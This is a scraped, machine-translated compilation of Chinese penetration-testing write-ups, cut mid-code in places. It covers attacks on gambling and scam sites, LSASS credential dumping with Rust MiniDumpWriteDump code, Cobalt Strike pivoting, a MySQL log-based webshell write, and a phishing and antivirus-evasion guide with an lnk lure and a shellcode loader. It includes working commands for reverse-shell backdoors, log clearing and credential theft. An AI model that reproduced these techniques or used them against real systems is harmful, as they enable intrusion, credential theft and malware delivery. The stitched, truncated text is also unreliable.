users, and the rest are all robots. These 69 users have rushed to 1.43 million? Are all the people who play qipai so rich? I am so happy that I can't bear to charge 6 yuan for the first recharge I can't get involved in gambling, this guy lost 2800 in one day After searching in the background for a long time, I couldn't find the upload point, so I put it first Go back to the other sqlmap and check it out, confirm that there is injection, and you are already jogging the library name ran out 16 libraries. According to the name, the RYPlatformManagerDB library may contain administrator-related information. Running watch name python sqlmap.py -r qipai.txt --tables -D RYPlatformManagerDB After searching for a long time, I found an administrator's account and password, which is the one bp burst in the previous bp, and there is some user information, nothing more valuable python sqlmap.py -r qipai.txt --is-dba is DBA permission. Try to get shell, just use sqlmap to blast the path in the mssql database directly python sqlmap.py -r qipai.txt --The blind spot used by os-shell is slow, and after a long wait, I finally successfully got the shell. It is a technical job on the surface, but in fact it is a physical job The current user permissions are very small, just a mssql database permission Systeminfo Check the system information and you can see that the system is 64-bit Windows server 2008 Cobaltstrike generates an attack payload, and then loads it with powershell on the target machine. The target machine is successfully launched net user view user tasklist viewing process, it should not be pretending to kill soft net start to view the enabled services and you can see that the firewall is enabled, so the previous nmap scan 445 and other ports are filtered Close the firewall, the right has not been raised yet IV. Raise rights/wei rights I learned earlier that this machine is Windows Server 2008, so I tried to use potatoes to increase the rights (MS16-075) After executing, I waited for a while. I was lucky. The machine was not patched and the authority was successfully raised in one go. I got the system permissions and started doing whatever I wanted. Enter file management and you can see the test.html file when the previous information is collected. netstat -ano Check out the port opening situation, 3389 is not opened Turn on manually can access remote desktop cobaltstrike I am not very skilled in operating it, so I should use metasploite to upload a horse generated by msf through cs, and msf enables monitoring Note: cs can directly derive shell to msf, but I tried it for a long time and never returned the session, so I had no choice but to upload a horse curve of msf to save the country. msf Enable monitoring Run uploaded horse on cs msf Successfully obtained the shell, which is the inherited system permissions View password hash, cannot be obtained, because the horse of msf is 32-bit, and the system is 64-bit ps view the process, find a 64-bit program running with system permission in the process, and then obtain the hash after migrating the process Go to the website that cracks hash online to check the administrator's password. The password is not complicated, and it can be found in a few seconds. Successfully logged into the remote desktop Leave two backdoors, one webshell, and one self-start nc for rebounding shell 5. Clean up traces and retreat meterpreter's clearv command is cleared with one click Or manually delete the Windows log Six.Summary 7. Experimental recommendation Manual injection using sqlmap https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182015011915533100001pk_campaign=freebuf-wemedia Through the study of this experiment, you can understand SQLmap, master the commonly used commands of SQLmap, and learn to use SQLmap to assist in the injection manually. Reprinted from the original link: https://www.freebuf.com/articles/network/250744.html

0x00 Introduction Last year, I was shopping in Weibu. I was originally trying to find a few IPs to practice my tracing ability, but I accidentally discovered a pig killing disk. If there are any missing parts in this article, please point them out in time. Please do not go to Weibu to find me to reappear this target. This case has been fully handed over to an official. 0x01 Simple recipe When we opened the link, we saw a strong "microdisk" aura coming to us. Since we had audited this set of source code ourselves, we directly found the corresponding place and called xss. As a result, it turned out that the microdisk was three-opened, yes, three-opened! In desperation, I still use the old idea and find a way to make the framework report an error, look at the version number, and go through the rce. Getting the version number and physical path, there is actually a small detail, you can see the picture below. Here is SERVER_NAME and SERVER_ADDR. I encountered a situation when I was working on similar projects before. The two information fed back by making the page report an error may contain real IP. If you cannot find the target real IP, you can try this trick. Everyone knows that such targets, other side stations, ports and other collections are of no use, so I won’t go into details. I registered an account and looked at it. There was no point to use it. At this time, I suddenly remembered that there was an injection here in goods/pid. Since we used our own day to hit it before, I had never used this injection point. I'll try it today. bingo! This is very nasty. If you know the physical path, then you can pass the shell? No, it's not possible, there are not enough permissions. But see what I found! The database information is displayed inexplicably, so can it be directly connected? Obviously not, because it cannot be connected externally. 0x02 It's right The stalemate lasted for about ten minutes, see what I found. adminer Hahaha, how did I find this? I mentioned before that we have audited the first and second openings of this system. There will be such an adminer database management system in certain specific directories, so I also fuzzed from this target, found it, and then connected it. Find the suspect IP, simply check the authenticity, positioning, etc. Sure enough, it is in our Greater Yunnan again. In order to ensure the integrity of the evidence, we still have to find a way to take a picture in the background. Because I am in Curry now, I can force the place where the blind hit XS is not successful and I can force the payment load of XS, and then induce the customer service to trigger it. Then I came in. The background upload point was deleted in the third version. The shell permissions in the database were not enough, and the required services could not be enabled, so I was unable to get the shell in the end. Reprinted in the original link: https://mp.weixin.qq.com/s?__biz=Mzg4MjcxMTAwMQ==mid=2247486198idx=1sn=e41bc5d7e4aee7314beaab7f5830435dchksm=cf53ca40f8244356493dff79a82e26a8c3ef89c50c4508de61cacf523527534d383e6d6b2445scene=178cur_album_id=2831511688645656580#rd

Preface lsass.exe (Local Security Authority Subsystem In the Service process space, there are important information such as the machine's domain, local username and password. If you obtain local high permissions, the user can access LSASS process memory, so that internal data can be exported for horizontal movement and permission escalation. Dumping user passwords or hash through lsas is also an indispensable step in the penetration process. Here we learn the principles and record various dumping methods. [toc] General Method mimikatz::logonpasswords We usually refer to these tools as LOLBins, which means that attackers can use these binaries to perform operations beyond their original purpose. We focus on programs that export memory in LOLBins. Whitelist Tool Three Microsoft signature whitelist programs Procdump.exe SQLDumper.exe createdump.exe Procdump dump Lsass.exe's memory ProcDump is a Microsoft signed legal binary file that is provided for dumping process memory. You can download the official ProcDump file in Microsoft documentation Use Procdump to grab the lsas process dmp file, procdump64.exe -accepteula -ma lsass.exe lsass_dump Then you can configure mimikatz to use sekurlsa:Minidump lsassdump.dmp sekurlsa:logonPasswords If you are sensitive to lsass.exe, you can also use it with the lsass.exe pid procdump64.exe -accepteula -ma pid lsass_dum This principle is that lsass.exe is the security mechanism of Windows system, mainly used for local security and login policies. Usually, after we enter the password when logging in to the system, the password will be stored in lsass.exe memory. After calling the two modules wdigest and tspkg, it is encrypted using a reversible algorithm and stored in memory. Mimikatz obtains the plaintext password through the inverse calculation of lsass.exe. Regarding the situation of the detection and killing, the Turvulin virus was not scanned, and 360 was not detected in the 13 version and was found to be detected in the 14 version. SQLDumper.exe The Sqldumper.exe utility is included in Microsoft SQL Server. It generates a memory dump for SQL Server and related processes for debugging purposes. Common paths to sqldumper are as follows C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe SQLDumper.exe is included in Microsoft SQL and Office to generate a complete dump file. tasklist /svc | findstr lsass.exe View the PID number of lsass.exe Sqldumper.exe ProcessID 00x01100 Export mdmp file Then locally decrypt it, you need to use the same version of the operating system. mimikatz.exe 'sekurlsa:minidump SQLDmpr0001.mdmp' 'sekurlsa:logonPasswords full' exit Killed by 360, turtlene was not detected createdump.exe With the emergence of .NET5, it is a native binary itself. Although it has a signature, it was also investigated and killed by AV. createdump.exe -u -f lsass.dmp lsass[PID] Will be killed by 360 comsvcs.dll comsvcs.dll mainly provides COM+ Services services. This file can be found in every Windows system, and the complete dump of the process can be implemented using Rundll32 to execute its export function MiniDump. This file is a whitelist file. We mainly use the export function APIMiniDump in Comsvsc.dll to achieve the purpose of dumping lsass.exe. Note that administrator permissions are also required. Because you need to enable SeDebugPrivilege permission. In cmd, this permission is disabled by default, and powershell is enabled by default. This file is located in C:\windows\system32\comsvcs.dll You can use the following method to call MiniDump to achieve dumping lsass.exe process : powershell C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full 360 also checks and kills. This behavior of dumping memory directly by calling APIMiniDump is still too sensitive. It is easy to be checked and killed without slight modification. Other Tools rdleakdiag.exe The default existing system: Windows 10 Windows 8.1 Windows 8 Windows 7 Windows Vista Software version 10.0.15063.0 6.3.9600.17415 6.2.9200.16384 6.1.7600.16385 6.0.6001.18000 If there is no such thing, you can choose to pass one up. Generate dmp memory file rdrleakdiag.exe /p pid /o outputdir /fullmemdmp /wait 1 Rst Two files will be generated, results*+process pid+.hlk, minidump*+process pid+.dmp. Then use mimikatz to crack it. AvDump.exe AvDump.exe is a program that comes with Avast antivirus software. It can be used to dump memory data of a specified process (lsass.exe). It comes with an Avast anti-soft digital signature. So it is generally not killed by AV. Download address: https://www.pconlife.com/viewfileinfo/avdump64-exe/#fileinfoDownloadSaveInfodivGoto2 It needs to be called in ps, otherwise cmd will not enable seDEBUGPrivilege permission by default, but now 360 will detect avdump. .\AvDump.exe --pid lsass pid --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\Users\admin\Desktop\lsass.dmp --min_interval 0 But it will also be killed by 360. Ownerly edit dll A demo of calling APIMiniDump This involves Windows process programming. You can first take a look at how to traverse the processes under Windows. It takes several APIs and a structure to traverse the process. 1. Create a process snapshot 2. Initialize the first process to be traversed 3. Continue to the next traversal 4. Process information structure Create process using CreateToolhelp32Snapshot HANDLE WINAPI CreateToolhelp32Snapshot( DWORD dwFlags, //Used to specify the object to be returned in the "snapshot", which can be TH32CS_SNAPPROCESS, etc. DWORD th32ProcessID //A process ID number is used to specify which process to obtain a snapshot. When obtaining a list of system processes or obtaining a snapshot of the current process, it can be set to 0. ); Get the first process handle using Process32First BOOL WINAPI Process32First( HANDLE hSnapshot,//_in, process snapshot handle LPPROCESSENTRY32 lppe//_out, pass in the process information structure, the system will fill in it for you. ); Get the next process using Process32Next BOOL WINAPI Process32Next( HANDLE hSnapshot, handle returned from CreateToolhelp32Snapshot LPPROCESSENTRY32 lppe Pointer to PROCESSENTRY32 structure, process information structure ); What also involves the structure of PROCESSENTRY32 is useful to us is dwSize size of initialization structure th32ProcessId Process IDszExeFile[MAX_PATH] Process path typedef struct tagPROCESSENTRY32 { DWORD dwSize; //Structure size, must be initialized before the first call; DWORD cntUsage; //The reference count of this process is 0, the process ends; DWORD th32ProcessID; //Process ID; DWORD th32DefaultHeapID; //Process default heap ID; DWORD th32ModuleID; //Process module ID; DWORD cntThreads; //count of threads that this process opens; DWORD th32ParentProcessID;//Parent process ID; LONG pcPriClassBase; //Thread priority; DWORD dwFlags; //Reserved; char szExeFile[MAX_PATH]; //full process name; } PROCESSENTRY32; So the code implemented by rust is as follows fn getProcess(){ unsafe{ let mut handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD,0); let mut process_entry : PROCESSENTRY32=zeroed(); process_entry.dwSize=std:mem:size_of:PROCESSENTRY32() as u32; //let mut process_handle=null_mut(); if !handle.is_null() { if Process32First(handle, mut process_entry)==1{ loop { let extFileName=OsString:from_wide(process_entry.szExeFile.iter().map(|x| x as u16).take_while(|x| x 0).collect:Vecu16().as_slice()); println!('{:}----------{:}',extFileName,process_entry.th32ProcessID); if Process32Next(handle, mut process_entry)==0{ break; } } } } } } Code for the complete dump lsas process memory use std:{mem:{ size_of}, ffi:{CStr, OsString, c_void, OsStr}, os:windows:prelude:{OsStringExt, AsRawHandle, RawHandle, OsStrExt}, fs:File, path:{Path, self}}; use std:ptr; use clap:{App,Arg}; use log:{error}; use windows_sys:{Win32:{Foundation:{ CloseHandle, GetLastError, INVALID_HANDLE_VALUE, HANDLE, LUID, }, Security:{TOKEN_PRIVILEGES, LUID_AND_ATTRIBUTES, SE_PRIVILEGE_ENABLED, TOKEN_ADJUST_PRIVILEGES, LookupPrivilegeValueA, AdjustTokenPrivileges}, System:{Threading:OpenProcessToken, Diagnostics:ToolHelp:TH32CS_SNAPTHREAD}, Storage:FileSystem:CreateFileA}, core:PCSTR}; use windows_sys:Win32:Storage:FileSystem:{ CreateFileW,CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, }; use windows_sys:Win32:System:Diagnostics:Debug:{ MiniDumpWithFullMemory, MiniDumpWriteDump }; use windows_sys:Win32:System:Diagnostics:ToolHelp:{ CreateToolhelp32Snapshot, Process32First, Process32Next, PROCESSENTRY32, TH32CS_SNAPPROCESS, }; use windows_sys:Win32:System:SystemServices:GENERIC_ALL; use windows_sys:Win32:System:Threading:{OpenProcess, PROCESS_ALL_ACCESS}; fn getPrivilege(handle : HANDLE){ unsafe{ let mut h_token: HANDLE=HANDLE:default(); let mut h_token_ptr: *mut HANDLE=mut h_token; let mut tkp: TOKEN_PRIVILEGES=TOKEN_PRIVILEGES { PrivilegeCount: 1, Privileges: [LUID_AND_ATTRIBUTES { Luid: LUID { LowPart: 0, HighPart: 0, }, Attributes: SE_PRIVILEGE_ENABLED, }], }; //Open the access token of the current process let token=OpenProcessToken(handle, TOKEN_ADJUST_PRIVILEGES, h_token_ptr); if token !=0 { let systemname=ptr:null_mut(); if LookupPrivilegeValueA( systemname, b'SeDebugPrivilege\0'.as_ptr(), mut tkp.Privileges[0].Luid) !=0 { tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; //println!('{:}',tkp.Privileges[0].Attributes); //Improve SeDebugPrivilege permissions for the current process if AdjustTokenPrivileges( h_token, 0, tkp as *const TOKEN_PRIVILEGES, 0, ptr:null_mut(), ptr:null_mut()) !=0 { println!('Token privileges adjusted successfully'); } else { let last_error=GetLastError(); println!('AdjustTokenPrivileges failed with error: STATUS({:})', last_error); } } else { let last_error=GetLastError(); println!('LookupPrivilegeValue failed with error: STATUS({:})', last_error); } //Close the access token handle CloseHandle(h_token); } else { let last_error=GetLastError(); println!('OpenProcessToken failed with error: STATUS({:})', last_error); } } } fn getProcess(LsassFile : str) { unsafe{ let mut h_snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if h_snapshot==INVALID_HANDLE_VALUE { println!('Failed to call CreateToolhelp32Snapshot'); } let mut process_entry: PROCESSENTRY32=std:mem:zeroed:PROCESSENTRY32(); process_entry.dwSize=size_of:PROCESSENTRY32() as u32; if Process32First(h_snapshot, mut process_entry)==0 { println!('Process32First error'); } loop { let extFileName=CStr:from_ptr(process_entry.szExeFile.as_ptr() as *const i8).to_bytes(); let extfile=OsString:from_wide(extFileName.iter().map(|x| x as u16).collect:Vecu16().as_slice()).to_string_lossy().into_owned(); if extfile.starts_with('lsass.exe'){ println!('[+] Got {:} PID: {:}',extfile,process_entry.th32ProcessID); break; } if Process32Next(h_snapshot, mut process_entry)==0 { println!('Failed to call Process32Next'); break; } } let lsass_pid=process_entry.th32ProcessID; let process_handle=OpenProcess(PROCESS_ALL_ACCESS, 0, lsass_pid); if process_handle==0 { println!('Fail to open the process '); } let lsassFile=LsassFile; let lsassFile: Vecu16=OsStr:new(lsassFile).encode_wide().chain(Some(0).into_iter()).collect(); let lsasshandle=CreateFileW( lsassFile.as_ptr() as *const u16, GENERIC_ALL, 0, ptr:null_mut(), CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0, ); if lsasshandle==INVALID_HANDLE_VALUE { println!('Fail to open/create file {:}',LsassFile.to_string()); } let result=MiniDumpWriteDump(

Foreword I saw an article in the middle of the night yesterday. I thought I would practice my skills, and halfway through the fight, I found that the masters had already traumatized such sites. So I learned from the experience of the masters, and took some exercises and recorded whatever I thought of. So the writing was quite complicated, and I also recorded whether there were any solutions. Then I changed the site and continued to walk. Information Collection The front desk is like this Take a look at other information Port Query 80 is the main page 8182 is the background login interface 1433 mssql directory scan Catalogue traversal Vulnerability Discovery Go to the backend page first Enter username: 123 prompts the user not exists Enter username: admin prompts the user or password is incorrect Confirm the admin account and there is no verification code to verify, you can try to break it Direct weak password admin 123456 Enter the background There are not many functions, and there is nothing to use Go back to the login to perform sql injection mssql, dba permissions, direct –os-shell The first machine here did not leave the network and did not echo. I gave up. After searching for several sites, I finally found a website that was released and echoed (it was easy to solve as long as it was released). CS is online Try CS here and judge that the network directly generates powershell online Check the information and check the tasklist Currently, it is database permissions. I tried to increase the authority, but it was directly disconnected and the website could not be opened. You should use it with caution, collect sufficient information and collect sufficient patch information. Another site was changed: Find the website path Get a webshell first Godzilla's sweet potatoes are elevated to system CS plug-in sweet potatoes also successfully upgraded their rights Grab the administrator password logonpasswords Paid Add to add a shadow account, administrator permissions Public network CS goes to intranet MSF through frp First post, FRP+CS implement local Kali shell Server (it's 5000 here, I forgot to take a screenshot after modifying) Client MSF enables monitoring CS Subsequent See if you can log in as an administrator by stealing the Token getuid //View the current tokenuse incognito //Load incognitolist_tokens -u //List accesstokenimpersonate_token "

0x01 There is a transfer machine There is a transfer machine, and this machine is out of the network, which is the most common situation. Often, you get an edge machine, which has multiple network cards, and the intranet machines do not leave the network. In this case, you can use this edge machine to transfer and go online. The topology is roughly as follows : Online method 1: SMB Beacon Introduction Official website introduction: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are connected, the child Beacon obtains the task from the parent Beacon and sends it. Because the connected Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, SMB Beacon is relatively hidden and may perform miraculously when surrounding the firewall. Using This Beacon requires that the host with an SMB Beacon must accept connections on port 445. Derived an SMB Beacon method: generate SMB Beacon target host in Listner Right-click spawn and select the corresponding Listener to go online Or use the command spawn smb in Beacon (smb is my smb listener name) Use plug-in, or scan the intranet machine with own port Go to view and select the target Using psexec Select a hash, select the smb listener and the corresponding session Go online After successful run, the character ∞∞ can be seen outside, which is the derived SMB Beacon. It is currently connected, you can use the link ip command to link it or the unlink ip command to disconnect it on Beacon. This kind of Beacon is used a lot in the horizontal penetration of the intranet. In an intranet environment, you can use the SMB Beacon generated by ipc$ to upload it to the target host for execution, but the target host will not be directly online. We need to use the link command (link ip) to connect it. Online method 2: Transfer listener(Reverse TCP Beacon) In fact, it is similar to the method The following will be automatically configured Then, like the above method, find the intranet host and know the account password, and pass psexec horizontally, select the transit listener Online method three: HTTP proxy The transit machine does not need to be online Use goproxy project as agent, project address: https://github.com/snail007/goproxy Process: 1. Upload proxy.exe to the web server (edge host), and enable http proxy on port 8080 C:\proxy.exe http -t tcp -p '0.0.0.0:8080' --daemon 2. Use the netsh command to redirect traffic to access port 822 of the intranet ip 192.168.111.131 (must be an unused port, otherwise it will fail) to redirect traffic to port 8080 of the external ip 192.168.1.88 netsh interface portproxy add v4tov4 listenaddress=192.168.111.131 listenport=822 connectaddress=192.168.1.88 connectport=8080 3. Create listener, configure it as follows 4. Generate a stageless payload, execute it on the business server, and successfully go online Connection process 192.168.111.236 → 192.168.111.131:822 → 192.168.1.88:8080→ C2(192.168.1.89) Online method 4, TCP Beacon (forward) Forward connection is similar to SMB Beacon. A parent beaconSMB Beacon is also required, and TCP Beacon is compatible with most actions derived from Cobalt Strike. Except for some User-driven attacks requiring explicit stagers (for example: Attacks → Packages , Attacks → Web Drive-by ). test: Generate a tcp beacon Use this beacon to generate a Trojan in the form of stageless: Upload to the target machine to run: Use the connect [ip address] [port] command to connect in the Beacon of the transit machine to go online: To destroy a Beacon link, use unlink [ip address] [session PID] in the console of the parent or child session. Later, you can reconnect to TCP Beacon from the same host (or other host). Online method 5. Use pystinger for proxy forwarding Detailed use of pystinger See the following chapter. Here is a brief demonstration: Generally, pystinger will not be used in this scenario Test environment: Attack aircraft kali: 192.168.1.35 Web server: 192.168.1.70, 192.168.111.129 Business server: 192.168.111.236 Process: 1. Upload proxy.php to the WEB server website directory, and return to UTF-8 when accessing normally The web server external network ip is 192.168.1.70 Upload stinger_server.exe and execute start stinger_server.exe 0.0.0.0 Execute on attack aircraft (192.168.1.89) ./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000 At this time, the 60020 port of the web server has been forwarded to the 60020 port of vps. CS settings to listen, HTTP Hosts is the intranet IP of the transit machine, and the port is 60020: Use psexec to move horizontally, select listener as pystinger, or directly generate payload to execute on the business host, and the business intranet host 192.168.111.236 can be successfully launched: Supplement: The transfer machine is Linux HTTP proxy (the transit machine does not need to be online) The usage method is the same as the above method three. Just use iptables to forward: echo 1 /proc/sys/net/ipv4/ip_forward iptables -A PREROUTING -p tcp -d 192.168.111.131 --dport 822 -j DNAT --to-destination 192.168.1.88:8080 iptables -A POSTROUTING -p tcp -d 192.168.1.88 --dport 8080 -j SNAT --to-source 192.168.111.131 Test: Transfer Machine (192.168.111.142) Attack aircraft Generate a stageless payload, execute it on the target machine, and successfully go online Connection process: (Re-screened image, port changed 8080-8081) 192.168.111.140 → 192.168.111.142:8080 → 192.168.111.142:8081→ 192.168.111.131:81(C2) Use pystinger for proxy forwarding Like the above method five, after establishing a pystinger connection, directly generate a payload to execute on the business host, and the business intranet host 192.168.111.236 can be successfully launched. CrossC2 Beacon can directly launch Linux machines through other machines CrossC2 is used to launch Linux or MacOS machines Project address: [Be sure to download the corresponding version] https://github.com/gloxec/CrossC2 Configuration: (I am running teamserver on Windows here) Create a https listener: Generate a payload (It is also possible in other ways) If it cannot be generated, you can also generate it directly on the command line After generation, upload it to the Linux machine, run it and then go online: Install CrossC2Kit plug-in to enrich beacon functions After the intranet machine is launched with the CS: relayed Linux machine, you can use the above method to launch the intranet machine. TCP Beacon Upload to the target machine to run. Then connect under Linux beacon: After going online, it will be a black box, just check in It is still recommended to use the above two methods. 0x02 Edge machines only have DNS protocol to go out of the network on DNS

Because this site came from a few months ago, the pictures may not be complete and there is no way to make up for them. When I was writing this article, the couple next door was applauding, and the sound was loud, which made me not have my mind written once, and I might have written a little confused. It is also worth mentioning that why do we often encounter such people next door when we are safe? Known target website The customer has given this kind of website before, so I remember it very deeply. For this kind of website, you can usually give up the normal testing process directly, because experience tells me that the main website function of the website is basically rarely vulnerable, so you can only start from the side station. Ctrl+u checked the wave of JS without finding any leaks. Looking back, I found that there was a discount activity hall in the upper right corner of the website The page seems familiar after opening I clicked on an activity and seemed to be able to submit text at will. There was no filtering. I entered xss with confidence and submitted. However, two days passed and it was useless. My mood was like clouds, fog and rain. However, I found that there is a review progress query below. After opening it, you will be asked to enter the user name. Since you have entered the user name, it should be a query that is brought into the database. I habitually added a 'click query. 10 seconds passed and there was no response. I was confused. Entering a normal and non-existent account test will pop up, but the query with single quotes has no response at all. When I caught the packet in F12-network, I found that there was a sending request. It was obvious that there was an injection, and the error was reported that the page was thinkphp. From the bottom corner, the version was 3.2.3. This version is really HC's favorite, from porn to loan platforms, and then to spinach, it is all this version of thinkphp. Try injecting a wave first Sqlmap got the administrator account and password in one wave. Suddenly I realized that I didn’t have a background address, and it was useless to get it. Fofa got the real IP in one wave and found that the phpmyadmin service exists on port 999, and 6588 has an Asp station titled Guardian and Host Master. Directory blasting, port scanning, subdomain mining, no background address was found. Os-shell succeeded, but nothing I typed. The same goes for Sql-shell. After careful observation, I found that the website path is installed in the guardian god. It may be that the guard god intercepted it. At that time, I was still wondering what it means to use the guard god in this php site. It was not until I went to Baidu to find hwshostmaster ten minutes later that I realized how ignorant I was. It turned out that the guard god was not just waf, he also had a service called host master, and the functions were probably the same as phpstudy. Observing local installation, I found that after the host master is installed by default, phpmyadmin will be started on port 999, and port 6588 will be launched on port 6, which is consistent with the target IP port I observed. Since the target site has phpmyadmin, I can try to use SQLmap to enumerate the other party's database account and password hash. Sqlmap –r sql.txt--string='Surname' --users --password Sqlmap enumerates root and test. The root password has not been cracked, but the test password has been cracked to 1234. Login successfully. Regarding this situation, there is an article in the Black and White Day official account of Mu Shen’s Black and White Day summary that has been written in detail. When Mu Shen saw this article, please ask me to pay the advertising fee. There are generally two methods for gettingshell from mysql database, intooutfile, and export logs. According to the file address of the injected error page Construct statement select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt' error #1 - Can't create/write to file, it should not have permission Try to use log writing, turn on the log first, and then set global general_log_file=' D:\\wwwroot\\xxx.com\\web\\a.php' It seems that it still doesn't work, I cracked. Suddenly I thought, since this wwwroot directory does not have permission, can the management page of the Guardian Host Master? After flipping through the host master file installed locally, you can confirm that the absolute path of the management page of the host master is D:\Hws.com\HwsHostMaster\host\web, try to modify the log Set global general_log_file=' D:\\Hws.com\\HwsHostMaster\\host\\web\\1.asp' succeeded. Then execute select "%eval request('chopper')%" to access http://xxx.xxx.xxx.xxx:6588/1.asp error 404. This problem has been difficult for me for a long time. Later I found out that I need to replace the log file with other ones so that the current log file can be accessed. Cknife connection is successful Whoami found that it was system permission, so the rest was simple. In order to prevent the guards from checking and killing, a msf is generated. It is downloaded through certutil, and then executed. msf is launched online, and then the migration process is loadmimikatz. After one set, I got the remote account password, took off my pants and packed the source code, submitted it to the customer, and it was done. Summary: 1. The main site has no loopholes. Take action on the side station. Here, from the promotional activity funding hall, you find that there is a registration page. You can try to nest an online xss script to obtain the administrator cookie information, but you have not obtained cookie2. In the review progress query, enter the real username and add a single quote. The page does not correspond. F12 found that there was an error on the page, which is thinkphp, and the version is 3.2.33. Inject it through sqlmap to obtain the hash value used. Here you get the hash value of root and test, which can decrypt the hash value of test. Sqlmap –r sql.txt --string='Surname' --users --password4. Query the other ports of the corresponding IP of the target website through fofa, and found that there are ports 999 and 6588, including 999-bit phpmyadmin ports and 6588-bit escort god management interface. 5. Enter the phpmyadmin background through test, and according to the physical path of the website displayed by the injection error, you can write to webshell6 through the into out import method. First write to the web directory, and display that there is no permission select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt'7. Turn on the log log, find it or fail set global general_log_file=' D:\\wwwroot\\xxx.com\\web\\a.php'8. Since the wwwroot directory does not have permission, can the Guardian Host Master Management Page be used? flip through the local installed host master file, and you can confirm that the absolute path of the host master's management page is D:\Hws.com\HwsHostMaster\host\web. Try to modify the log Set global general_log_file=' D:\\Hws.com\\HwsHostMaster\\host\web\1.asp'9. Then execute select "%eval request('chopper')%" 10. Connect successfully through knife Reprinted from the original text connection: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247486068idx=2sn=4e32251aaf8c25efee653b3314a05a29chksm=cfa6ae67f8d127715b23c7b8403a08ccfac2e1bff2ac68030401d54698bcb10cd637a55f7d15scene=178cur_album_id=1553386251775492098#rd

Brief description Fishing is a common method in offensive and defensive confrontation. Attackers usually disguise themselves as trustworthy entities, such as legal institutions, companies or individuals, to lure victims to reveal sensitive information or perform malicious operations. They can quickly tear the target's wounds and quickly enter the intranet to brush points. When submitting Trojans, they need to consider evading anti-virus software detection. This article will focus on some common phishing methods and Trojans to avoid killing confrontations. Information Collection Batch mailbox collection https://app.snov.io/ http://www.skymem.info/ Search Engine Generally speaking, corporate emails have email gateways, and email delivery is easily blocked by refunds, so we need to choose private emails or emails that are not blocked by email servers: As reported by xx, xx recruitment faces the public's email address, the relevant syntax: site:'xxx.com' Report site:'xxx.com' Recruitment xx company report @126.com xx company recruitment @qq.com Fishing Techniques Social workers fishing The first is the target selection. Target groups: hr, manager, finance and other people with weak safety awareness are preferred. Prepare multiple sets of scenarios in advance to deal with them. Select the target company branch for fishing with a high success rate. Think about the words and response measures in advance to avoid being discovered. It is best not to be at the headquarters and avoid IT Information Security Department. The master of the Sheniu can try to fish by phone, gain trust, and then add WeChat to send Trojan horses (requires extraordinary psychological qualities and adaptability, and I have learned a lot from Pan Gaogong before) Mail Phishing Mass emails (not recommended, they are easily discovered by administrators or intercepted by email gateways) Collect key personal email address to deliver directional delivery (recommended, highly concealed) Welfare subsidy issuance Follow the current affairs topic, use various welfare activities to attract target users to click, and convert the phishing link to QR code to send Resume delivery Recruitment and delivery resume, hr will not carefully check the suffix when facing a large number of resumes Can't write fishing copy? It doesn't matter, don't use it by hand if you can generate it automatically. Here is a chicken leg for our chatgpt brother Report letter xxx real-name reporting and complaints, this kind of email is generally handled and feedback quickly Phinging File Disguise General tips Trojans need to be compressed, add passwords and hide content, or double-compress the Trojan files to bypass the detection of the email gateway to a certain extent Select unusual suffixes but can still be executed as exe, such as scr, com, etc. The file name is long named. If the other file displays incorrectly, the suffix will not be visible during preview. lnk fishing If you know that the target unit is not using 360 Tianqing, you can use the lnk file for phishing (360 will intercept) Fill in the shortcut target position: %windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.doc amp;amp; C:\Windows\explorer.exe '.\.__MACOS__\.__MACOS__\.__MACOS1__\fsx.exe' Icon Change Path Selection: C:\\Program Files (x86)\\Microsoft\\Edge\\Application %SystemRoot%\\System32\\imageres.dll %SystemRoot%\\System32\\shell32.dll Box Error Tips Run msgbox to prompt "File is corrupted" and other confusing content vbs implementation On Error Resume Next WScript.Sleep 2000 msgbox 'The current file is corrupt, please change the tool to open it',64,'tip' Go code implementation package main import ( 'github.com/gen2brain/dlgs' ) func box() { _, err :=dlgs.Info('Tip', 'The current file is corrupted, please change the tool to open') if err !=nil { panic(err) } } Realize the effect File Bundler Bind normal files and malicious Trojans. After running, the exe itself will be deleted, and then the normal files will be released and opened in the current directory, and the Trojans will be released to run under the C:\Users\Public\Videos directory Version 1.1 bypass regular soft-kill (360, def, turtle, etc.) Version 1.2 Added files automatically hide after they are released Effect realization Common soft-killing types Soft-killing type Soft-killing features Turquoise There are many restrictions on compilation parameters, and the hash and string features are recognized. The static can be dynamically executed is basically not detected and killed. Some go libraries are called to report poison. 360 Single 360 check is not high. After installing antivirus, your son becomes a father. The killing power is greatly improved. The antivirus will automatically upload samples. It is easy to detect and kill after the cloud is released for a while. It is recommended to use separate loading methods and use anti-sandbox code to extend the time of the horse. 360 core crystal After opening, there is no big impact on the overall killing performance. Avoid loading shellcode using process injection. Execute the command to use the bof plugin as a replacement. Defender Added cobaltstrike rules, and it is recommended to use Stageless, which is better than Stage. The sleep_mask parameter is enabled in version 4.5 to enhance the killing ability, and the detection rate of large files is not high. Basic loading method The following is just a basic example, which only implements the function of encryption, decryption and loading. First use python script to encrypt the payload.c file import base64 originalShellcode=b'\xfc\xe8\x89\x00' encryptedShellcode=bytes([byte ^0xFF for byte in originalShellcode]) encodedShellcode=base64.b64encode(encryptedShellcode).decode('utf-8') print(encodedShellcode) Fill in encryptedShellcode for the output content to compile package main import ( 'encoding/base64' 'syscall' 'unsafe' 'github.com/lxn/win' 'golang.org/x/sys/windows' ) func main() { //Decrypt shellcode content via base64 and XOR win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) encryptedShellcode 